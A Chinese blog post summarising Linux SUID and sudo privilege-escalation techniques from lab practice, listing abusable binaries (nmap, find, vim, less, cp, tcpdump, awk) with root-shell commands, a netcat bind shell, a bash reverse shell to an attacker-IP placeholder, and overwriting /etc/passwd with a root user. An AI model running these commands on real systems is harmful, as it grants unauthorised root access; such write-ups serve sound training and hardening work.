前言

最近打靶场的时候最后都会涉及到提权,所以想着总结一下。

SUID提权原理

SUID(设置用户ID)是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。

那么,为什么要给Linux二进制文件设置这种权限呢?其实原因有很多,例如,程序ping需要root权限才能打开网络套接字,但执行该程序的用户通常都是由普通用户,来验证与其他主机的连通性。

但是,如果某些现有的二进制文件和实用程序具有SUID权限的话,就可以在执行时将权限提升为root。

比如password的权限:



用户可以输入自己的密码或者不需要密码在root权限下执行命令,这可在设置文件 /etc/sudoers 中配置

1.1 /etc/sudoers 语法

  1. root ALL=(ALL) ALL

root 用户可以从 ALL(任何)终端执行,充当ALL(任何)用户,并运行ALL(任何)命令。第一部分指定用户,第二部分指定可充当用户,第三部分指定 sudo 可运行的命令。

  1. touhid ALL= /sbin/poweroff

输入 touchid 的密码,可以 sudo 执行 poweroff 命令。

  1. touhid ALL = (root) NOPASSWD: /usr/bin/find

不输入密码,可以 sudo 执行 find 命令

1.2 查找具有 SUID 权限位文件

以下命令可以找到正在系统上运行的所有SUID可执行文件。准确的说,这个命令将从/目录中查找具有SUID权限位且属主为root的文件并输出它们,然后将所有错误重定向到/dev/null,从而仅列出该用户具有访问权限的那些二进制文件。

  1. # suid权限值就是4000,下面两个语句一个意思
  2. find / -user root -perm -4000 -print 2>/dev/null
  3. find / -perm -u=s -type f 2>/dev/null

也可以使用 sudo -l 命令列出当前用户可执行的命令:

常用的提权方式

2.1 nmap

nmap(2.02-5.21)存在交换模式,可利用提权

  1. nmap --interactive

之后执行:

  1. nmap> !sh
  2. sh-3.2# whoami
  3. root

msf中的模块为:

  1. exploit/unix/local/setuid_nmap

较新版可使用 --script 参数:

  1. echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse

2.2 find

find比较常用,find用来在系统中查找文件。同时,它也有执行命令的能力。 因此,如果配置为使用SUID权限运行,则可以通过find执行的命令都将以root身份去运行。

  1. touch test
  2. find test -exec whoami \;
  1. 进入shell
  2. find test -exec '/bin/sh' \;
  3. sh-5.0# whoami
  4. root

linux一般都安装了nc 我们也可以利用nc 广播或反弹shell

广播shell:

  1. find test -exec netcat -lvp 5555 -e /bin/sh \;

kali(攻击机)上:

  1. nc 靶机ip 4444

反弹shell:

  1. find test -exec bash -c 'bash -i >& /dev/tcp/攻击机IP/4444 0>&1' \;

kali(攻击机)上:

  1. nc -lvnp 4444

2.3 vi/vim

打开vim,按下ESC

  1. :set shell=/bin/sh
  2. :shell

或者

  1. sudo vim -c '!sh'

2.4 bash

  1. bash -p
  2. bash-3.2# id
  3. uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)

2.5 less

注意事项:我记得less跟more提权的时候那个命令行要拉低一点,不能在一页显示完文件才行(要注意的是使用more和less一定读取一个比较大的文件,如果文件太小无法进入翻页功能也就无法使用!命令进入shell)

  1. less /etc/passwd
  2. !/bin/sh

2.6 more

  1. more /home/pelle/myfile
  2. !/bin/bash

2.7 cp

覆盖 /etc/shadow/etc/passwd

  1. [zabbix@localhost ~]$ cat /etc/passwd >passwd
  2. 2.[zabbix@localhost ~]$ openssl passwd -1 -salt hack hack123
  3. 3.$1$hack$WTn0dk2QjNeKfl.DHOUue0
  4. 4.[zabbix@localhost ~]$ echo 'hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0::/root/:/bin/bash' >> passwd
  5. 5.[zabbix@localhost ~]$ cp passwd /etc/passwd
  6. 6.[zabbix@localhost ~]$ su - hack
  7. 7.Password:
  8. 8.[root@361way ~]# id
  9. 9.uid=0(hack) gid=0(root) groups=0(root)
  10. 10.[root@361way ~]# cat /etc/passwd|tail -1
  11. 11.hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0::/root/:/bin/bash

2.8 mv

覆盖 /etc/shadow/etc/passwd

2.9 nano

nano也算是比较上古的文本编辑器了

nano进入shell的方法为

  1. nano #进入nano编辑器
  2. Ctrl + R
  3. Ctrl + X
  4. #即可输入命令

2.10 awk

  1. awk 'BEGIN {system("/bin/sh")}'

2.11 man

  1. man passwd
  2. !/bin/bash

2.12 wget

  1. wget http://192.168.56.1:8080/passwd -O /etc/passwd

2.13 apache

仅可查看文件,不能弹 shell:

  1. apache2 -f /etc/shadow

2.14 tcpdump

  1. echo $'id\ncat /etc/shadow' > /tmp/.test
  2. chmod +x /tmp/.test
  3. sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

2.15 python/perl/ruby/lua/php/etc

python:

  1. python -c "import os;os.system('/bin/bash')"

perl:

  1. exec "/bin/bash";

其他的语言反弹shell参考以下链接:

https://weibell.github.io/reverse-shell-generator/

参考链接:

防范

SUID提权由来已久,属于一种古早的提权技术,但其生命力经久不衰。

这要求管理员要仔细研究具有SUID权限的文件,不要给易被利用的文件以SUID权限,防止SUID的滥用导致黑客在进入服务器时轻易获取root权限。

Linux-SUID提权的更多相关文章

  1. Linux suid 提权

    SUID (Set owner User ID up on execution) 是给予文件的一个特殊类型的文件权限.在 Linux/Unix中,当一个程序运行的时候, 程序将从登录用户处继承权限.S ...

  2. Linux提权-suid提权

    0x1 suid概念 通俗理解为其他用户执行这个程序是可以用该程序所有者/组的权限 0x2 suid提权 简单理解为,一个文件有s标志(权限中包含s),并且对应的是root权限,那么当运行这个程序时就 ...

  3. Linux下用SUID提权

    关于SUID详细:Linux下的用户.组和权限 SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得 ...

  4. Linux常见提权

    常见的linux提权 内核漏洞提权 查看发行版 cat /etc/issue cat /etc/*-release 查看内核版本 uname -a 查看已经安装的程序 dpkg -l rpm -qa ...

  5. linux 全自动提权 exp perl脚本

    linux 全自动提权 exp perl脚本 作者: admin 日期: 2013/01/19发表评论 (0) 查看评论   国外流传过来的 地址 http://dl.packetstormsecur ...

  6. Linux下提权常用小命令

    有些新手朋友在拿到一个webshell后如果看到服务器是Linux或Unix操作系统的就直接放弃提权,认为Linux或Unix下的提权很难,不是大家能做的,其实Linux下的提权并没有很多人想象的那么 ...

  7. linux关于suid提权笔记

    suid全称是Set owner User ID up on execution.这是Linux给可执行文件的一个属性,上述情况下,普通用户之所以也可以使用ping命令,原因就在我们给ping这个可执 ...

  8. Os-hackNos-1(drupal7+suid提权)

    一.信息收集 得到 ip是 192.168.56.101 , 端口开启了22和80,扫目录发现drupal 7 访问一下呢 在exploit-db上面搜索到存在相关的漏洞,而且是用直接上msf 使用第 ...

  9. linux 内核提权

    不经意间找到了大牛总结的一些Linux提权exp 我直接借花献佛分享给大家 #CVE #Description #Kernels CVE-2017-1000367 [Sudo] (Sudo 1.8.6 ...

  10. Linux用户提权管理方案

    提权管理方案背景: 如果一个公司有10余个运维或网络安全人员,同时管理服务器,切换到管理员用户时(su - root),必须要有root管理员密码,如果其中一人修改过root密码,其他用户则登录不了, ...

随机推荐

  1. Eureka和zookeeper都可以提供服务注册与发现的功能,请说说两个的区别?

    Zookeeper保证了CP(C:一致性,P:分区容错性),Eureka保证了AP(A:高可用) (1)当向注册中心查询服务列表时,我们可以容忍注册中心返回的是几分钟以前的信息,但不能容忍直接down ...

  2. Thread 类中的 yield 方法有什么作用?

    使当前线程从执行状态(运行状态)变为可执行态(就绪状态). 当前线程到了就绪状态,那么接下来哪个线程会从就绪状态变成执行状态呢?可 能是当前线程,也可能是其他线程,看系统的分配了.

  3. 区分 BeanFactory 和 ApplicationContext?

    BeanFactory ApplicationContext 它使用懒加载 它使用即时加载 它使用语法显式提供资源对象 它自己创建和管理资源对象 不支持国际化 支持国际化 不支持基于依赖的注解 支持基 ...

  4. spring-boot-learning自动配置原理

    启动器: spring-boot-starter:spring-boot场景启动器,帮我们倒入我们场景需要的组件依赖 不同的场景有不同的启动器: spring-boot-starter-web     ...

  5. springboot 指定启动环境

    java -jar dbmaster.jar --spring.profiles.active=test

  6. python中类变量和实例变量的区别

    类变量:可在类的所有实例之间共享的值(也就是说,它们不是单独分配给每个实例的).实例变量:实例化之后,每个实例单独拥有的变量. class student(): age = 0 name = 'stu ...

  7. python中dtype,type,astype的区别

    python中dtype,type,astype的区别 type() dtype() astype() 函数名称 用法 type 返回参数的数据类型 dtype 返回数组中元素的数据类型 astype ...

  8. 前端react+redux+koa写的博客推荐

    React-Node搭建的博客 曾经用的php+mysql+js写的博客,现在看来已经很low了,所以用目前最火的react+koa框架重构一下.先上地址吧:目前线上版本http://www.liuw ...

  9. java中什么叫多重捕获MultiCatch,它的用法是怎样的?

    2.多重捕获MultiCatch 马克-to-win:什么叫多重捕获MultiCatch?一段代码可能引起多个异常,这时可以定义两个或更多的catch子句来处理这种情况,每个子句捕获一种类型的异常.马 ...

  10. 【每日日报】第五十一天---jsp

    1 开始学习JSP的使用 一个简单的jsp代码 <html> <head><title>Hello World</title></head> ...